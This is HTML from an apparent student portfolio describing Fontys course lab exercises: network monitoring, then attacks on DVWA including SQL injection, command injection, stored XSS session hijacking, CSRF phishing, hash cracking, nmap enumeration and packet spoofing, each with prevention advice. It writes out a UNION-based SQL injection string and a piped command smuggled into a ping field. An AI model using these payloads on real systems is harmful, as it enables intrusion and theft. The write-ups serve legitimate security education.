          <div class="portfolio-modal modal fade" id="portfolioModal7" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S3</h2>
          <p class="item-intro text-muted">IT Monitoring</p>
          <p>I implemented a Nagios server and installed Ntop as part of my network monitoring
          system.</p>
          <a href="../../img/portfolio/blue/OnlineHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/OnlineHosts.png" alt=""></a>
          <p>Ntop generates a list with all hosts that are online on the network and you can filter
          them by VLAN. You can see how much bandwidth they are using how much data was
          transferred since they are online and how many flows are going to that host.</p>
          <a href="../../img/portfolio/blue/MostUsedHosts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedHosts.png" alt=""></a>
          <p>Here I can see which host uses the most traffic in my DMZ. With 172.16.0.2 being the
          apache server and 172.16.0.3 being the IIS server.</p>
          <a href="../../img/portfolio/blue/MostUsedProtocols.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/MostUsedProtocols.png" alt=""></a>
          <p>Here I can see which protocols are used the most. Windows update on number 1 because it
          needs to download a lot and after that ssl for the https traffic to my website and ftp
          to push changes. This doesn't indicate that the most traffic is going to windows update
          only that it used the most bandwidth.</p>
          <a href="../../img/portfolio/blue/BulgarianHacker.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/BulgarianHacker.png" alt=""></a>
          <p>Ntop even managed to identify a rogue Bulgarian hacker trying to access my Jenkins
          server.</p>
          <a href="../../img/portfolio/blue/HostsStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostsStatus.png" alt=""></a>
          <p>This is Nagios it is in some ways similar to Ntop but is much more advanced and can do
          some things that Ntop can't. On this page you can see al the hosts that are monitored by
          Nagios. It displays if the hosts are up and running or if there are any problems.</p>
          <a href="../../img/portfolio/blue/HostDetails.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/HostDetails.png" alt=""></a>
          <p>If you click on one of the monitored hosts from the previous picture Nagios will show you
          with a more detailed report on the host with some more information about uptime and
          status.</p>
          <a href="../../img/portfolio/blue/ServiceStatus.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/blue/ServiceStatus.png" alt=""></a>
          <p>This is a great example on something Nagios is much better at then Ntop. Here Nagios
          monitors all the services you flagged on different hosts. For example your apache server
          could be down but the physical Linux server is still up and running. Nagios and Ntop
          will both say this Linux machine is up and fine but Nagios will also say that the
          http/https service is down. The same goes for every other service you configure to
          monitor (SSH/FTP).</p>
          <ul class="list-inline">
          <li>Date: April 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Monitoring</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal8" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">SQL injection</p>
          <a href="../../img/portfolio/red/SqlStart.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/SqlStart.png" alt=""></a>
          <p>I applied sql injection on a search function in DVWA.</p>
          <a href="../../img/portfolio/red/CheckIfVuln.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVuln.png" alt=""></a>
          <p>The easiest way to check if the search function is vulnerable is to just type some
          gibberish that the search function doesn't expect. This should generate a sql error.</p>
          <a href="../../img/portfolio/red/CheckIfVulnResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CheckIfVulnResult.png" alt=""></a>
          <p>And it did! Now we know that the search function is vulnerable and we can try some
          injections</p>
          <p>So know we can check which database we're dealing with by getting the version.</p>
          <a href="../../img/portfolio/red/GetDbVersion.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetDbVersion.png" alt=""></a>
          <p>Oke let's break it down.</p>
          <p>The query that is used for searching the users probably looks like something like this
          "SELECT first_name, last_name FROM users WHERE user_id = '$id'" and I typed "null' UNION
          select CURRENT_user, @@version #"</p>
          <p>The "null'" ends the original query and makes it obsolete because there probably aren't
           any users with a 'null' as id. The 'UNION' allows me to execute a subquery and the
          result from this query gets added underneath the results from the original query.</p>
          <p>Now I use 'select' to indicate which information I want to get. I used 'CURRENT_user' and
          '@@version' to get both the current user and the database version.</p>
          <p>The reason that I select both the "CURRENT_user" and the "@@version" in the same query,
          is that if I would only select for example "@@version" I would get the error displayed
          below. I could have fixed that by rewriting the query like this: "INSERT QUERY" and I
          typed "null' UNION select @@version, @@version #" This way the subquery matches the
          amount of columns of the original query again.</p>
          <a href="../../img/portfolio/Use%20Of%23.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/Use%20Of%23.png" alt=""></a>
          <p>TALK ABOUT THE #</p>
          <a href="../../img/portfolio/red/DiffNumberColumns.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/DiffNumberColumns.png" alt=""></a>
          <p>Now we can execute any query we want as long as it matches the amount of columns of the
          original query, otherwise we get a error like the one displayed above. Now we can try
          something that has a little more impact.</p>
          <a href="../../img/portfolio/red/GetAllTables.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetAllTables.png" alt=""></a>
          <p>For example by getting all the table names inside the database. This is obvious not a
          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
          <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
           the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
           <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
           </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
          <li>Dictionary attacks</li>
          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
           <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
          <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
          decrypt to get the password.</p>
          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
